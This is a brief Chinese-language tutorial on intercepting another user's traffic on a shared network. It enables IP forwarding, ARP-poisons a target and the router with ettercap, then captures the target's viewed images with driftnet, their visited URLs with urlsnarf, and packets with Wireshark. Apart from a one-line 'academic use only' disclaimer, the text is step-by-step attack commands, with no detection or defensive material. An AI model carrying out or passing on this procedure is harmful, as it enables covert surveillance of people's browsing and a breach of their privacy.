0x01前提
攻击者与目标要位于同一路由网络下
使用工具:kali linux(ettercap+wireshark+dsniff)
(本教程仅用于学术交流)
0x02过程
终端输入echo 1 > /proc/sys/net/ipv4/ip_forward
开启转发保证目标能正常上网
一。开启嗅探
终端输入ettercap -G
打开ettercap
界面,选择Sniff
–> Unified sniffing
–> 选择你对应的网卡 –> Hosts
–> Scan for hosts
–> Hosts list
–> 将目标ip添加到Target 1
,将路由器ip添加到Target 2
–> Mitm
–> APR poisoning
–> Sniff remote connections
–> Start
–> Start sniffing
二。监听数据
终端输入driftnet -i eth0
(我嗅探使用的网卡是eth0,具体情况具体填写),弹出一个窗口会显示目标正在浏览的图片。
终端输入urlsnarf -i eth0
监听目标浏览过的网页日志。
打开wireshark进行抓包。